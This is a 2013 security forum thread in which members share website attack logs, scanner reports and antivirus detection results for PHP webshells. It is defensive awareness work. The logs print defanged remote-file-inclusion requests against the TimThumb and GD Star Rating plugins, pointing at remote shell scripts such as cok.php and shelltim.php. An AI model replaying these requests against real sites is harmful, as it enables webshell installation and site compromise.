Website owners should always be on the look out for “bad visitors” and php attacks.
Weak php is the royal way for malcreants to get into “your” website.
So it is good to have a look at the following logs now and then to know what is threatening us from the “Interwebs”.
Some example links for instance:
http://www.computerhok.nl/tmp/logwatch/
http://fsiworldwide.com/logs/log.files.html
http://nepeta.mozai.com/scoundrels.html
http://champ.com.sg/watch/weekly/2013/02/03/cgi.html
http://www.steamid.co.uk/badvisitors.php?page=9
Now we can perform a search query in combination with the term, for instance “cok.php” combined with “urlquery.net”
threat description http://forums.oscommerce.com/topic/378505-sites-hacked/ (link article author = gotlib)
see search result here: http://urlquery.net/report.php?id=912463 IDS alerts → INDICATOR-OBFUSCATION GIF header with PHP tags - likely malicious
and → INDICATOR-OBFUSCATION eval gzinflate base64_decode call - likely malicious
also look at the log interface here: http://leehaywood.org/rss/logs.php?t=404 with many an example…

and this for bajo.php: http://urlquery.net/report.php?id=954473 {“sha256”: “9652d7374719d7f80942e86ab0c7db992318fc4d3db0a81632cabee00395e59b”, “result”: 1, “last_analysis_url”: “/en/url/9652d7374719d7f80942e86ab0c7db992318fc4d3db0a81632cabee00395e59b/analysis/”, “timestamp”: 1360286884, “positives”: 3, “last_analysis_date”: “2013-02-08 01:28:04”, “total”: 34, “url_exists”: true, “reanalyse_url”: “/en/url/submission/?force=1&url=htxp://picasa.com.amareacao.com.br/bajo.php”}
{“result”: 0, “verbose_msg”: “Invalid URL”}…blacklisted only by scumware: http://www.urlvoid.com/scan/picasa.com.amareacao.com.br/

ff [gzip] tgt object detected as PHP:Agent-KQ[Trj] by avast! Web Shield - we have detection!,

polonus

Here → -http://webcache.googleusercontent.com/search?q=cache:Tx0Sosq0joEJ:http://tech.graphicline.co.za/gd-star-ratings-vulnerability/%2Bwp-content/gd-star-rating+attack&client=flock&channel=fds&oe=utf-8&hl=en&ct=clnk
we can read about a flaw for this WP plug-in: wp-content/gd-star-rating/

GD Star Ratings vulnerability in plugin version 1.9.18 for WordPress contains a flaw that may lead to an unauthorized information disclosure. The vulnerability in GD Star Ratings is caused by export.php script failing to properly verify user authentication. This may allow a remote attacker to gain access to access to system files and export sensitive information (e.g. user names, votes, email, and IP addresses).

Exploit very similar to the well-known Timthumb exploit pattern through content.gif. (credits go to tech.graphicline.co.za article author Mike Only solution is to update to version 1.9.20 and beyond…see all the attacked logs here:
****************** /wp-content/gd-star-rating/?src=htcp%3A%2F%2Fpicasa.com.m-2p.com/suntik.php *
09:39:11 13 Feb 2013 2 1,000 /wp-content/gd-star-rating/?src=htcp:/blogger.com.lendyourhome.org/cok.php
05:28:01 09 Feb 2013 2 1,000 /wp-content/gd-star-rating/?src=htvp:/flickr.com.alba-sport.net/bad.php
01:56:16 04 Feb 2013 4 2,000 /wp-content/gd-star-rating/?src=htxp:/picasa.com.compraonlinecr.com/index.php
20:21:11 01 Feb 2013 1 500 /wp-content/gd-star-rating/?src=htxp:/picasa.com.copiinet.ro/wordpress.php
14:34:55 01 Feb 2013 2 1,000 /wp-content/gd-star-rating/?src=htxp:/wordpress.com.allnetmall.com/shelltim.php
10:06:19 13 Feb 2013 11 5,500 /wp-content/gd-star-rating/timthumb.php?src=hxtp%3A%2F%2Fblogger.com.lendyourhome.org%2Fcok.php
09:41:39 13 Feb 2013 3 1,500 /wp-content/gd-star-rating/timthumb.php?src=htxp:/blogger.com.lendyourhome.org/cok.php

• possible webshell malware: http://urlquery.net/report.php?id=521113
  WOT flag: http://www.mywot.com/en/scorecard/urmobi.in?utm_source=addon&utm_content=popup-donuts
  Not found here: http://www.urlvoid.com/scan/picasa.com.m-2p.com/

pol

PHP_malcode can also be used in website defacement. For instance: crut.php . Notified by: AdiPaTi
See this list: http://www.zone-h.org/archive/ip=212.93.229.3
Is this onetime defaced site now secure. No it is not: http://sitecheck.sucuri.net/results/elvelux.si/oscomm see Powered by: PHP/5.3.20
Vulnerable to this attack -http://malwaremustdie.blogspot.nl/2013/01/peeking-at-jdb-exploit-kit-infector.html (reported by HulkCrusader)
avast! Web Shield detects trgt rss-rzip here as infected with JS:Decode-GB[Trj] We have detection for this!

polonus

Sucuri http://sitecheck.sucuri.net/results/picasa.com.playteck.net/indeks.php

VirusTotal…no detection…yet
https://www.virustotal.com/nb/file/2dc4c1314af7d367e84c13b835911cd502cc1eff0e4c6d6d351e6aaa8ae530dd/analysis/1361555617/

Hi Pondus,

Good that the issue was started here then. Malware should be put down as close as to where the attack starts…
We are here to ruin the malcreant’s day. What is encouraging is that this: -http://labs.sucuri.net/db/malware/malware-entry-mwjsgen2
is being flagged by avast! Web Shield as JS:Illredir-AQ[Trj]. There the code is being detected!
Still has to be reported…https://www.virustotal.com/nb/file/05009d5813bedd67a4d3f69e7f8fb6bdd050df685e56eebc462d058a004b0670/analysis/1361557974/

pol

Bad visitors can also be youngsters thinking they are real hackers: http://carbonize.co.uk/wp/2009/03/10/sad-children-thinking-they-are-hackers/ (link article author = carbonize). Example here: http://zulu.zscaler.com/submission/show/47f4060329f77735222625fec4ba2609-1361627409
Flagged as TR/Script.75
Not detected here: http://wepawet.iseclab.org/view.php?hash=8f3dd06df8d1932d79e8b8e85c6d5798&t=1335177069&type=js
and http://quttera.com/sitescan/www.leikamzinn.at
And our avast! Web Shield detect this as PHP:Small-E[Trj]. We have detection for this!

polonus

One in the top 100 cgi scripts: htxp://img.youtube.com.merkezefendi.gov.tr/cilik.php → http://urlquery.net/report.php?id=882250
IDS alert: ET CURRENT_EVENTS php with eval/gzinflate/base64_decode possible webshell &
INDICATOR-OBFUSCATION eval gzinflate base64_decode call - likely malicious &
INDICATOR-OBFUSCATION GIF header with PHP tags - likely malicious
A file viewer tool can not safely check this type of file.
Decoding decrypt PHP gives what is shown in the attached image.
Avast does not detect: https://www.virustotal.com/nb/file/f4460108b01b1df8873b420217b981f2b529d47ce4817e0dd89db0c81f4580ee/analysis/1251295472/
Good the malware seems now dead anyway: https://www.virustotal.com/nb/file/f4460108b01b1df8873b420217b981f2b529d47ce4817e0dd89db0c81f4580ee/analysis/1251295472/
blacklisted: http://www.urlvoid.com/scan/bandarlampung.us/
Another one here: http://urlquery.net/report.php?id=859053
See: https://www.virustotal.com/nb/file/ac9877e9680366873b6047679705d352db7c7dfd5a0a5add3fed90049f1fdbb7/analysis/1359179711/
But cilik.php is being detected by avast!Webshield as PHP:Agent-MQ[Trj]. We have detection!

polonus

[b]Avast does not detect: [/b]https://www.virustotal.com/nb/file/f4460108b01b1df8873b420217b981f2b529d47ce4817e0dd89db0c81f4580ee/analysis/1251295472/

It does......if you post latest scan 1 minute ago ;) https://www.virustotal.com/nb/file/ac9877e9680366873b6047679705d352db7c7dfd5a0a5add3fed90049f1fdbb7/analysis/1361657277/

but not this http://urlquery.net/report.php?id=859053
https://www.virustotal.com/nb/file/a2410f9b5db6ce829a8fcb4386dded798fcf8c3b09ffc8713786d70c5d854537/analysis/1361657457/

Hi Pondus,

What would polonus do without Pondus being there to check the scan and crossing the t’s and dotting the i’s. Again thanks a lot my friend. Thanks for the ongoing inspiration and support.

mange takk,

Damian

its all about team work ;D

A bit dated but still actual the attack methodology of the website attackers: http://blog.spiderlabs.com/2012/02/common-attack-methodologies-identified-in-european-customers.html
More recent and being slowly released (by article link author = Jeremiah Grossman): http://blog.whitehatsec.com/top-ten-web-hacking-techniques-of-2012/

polonus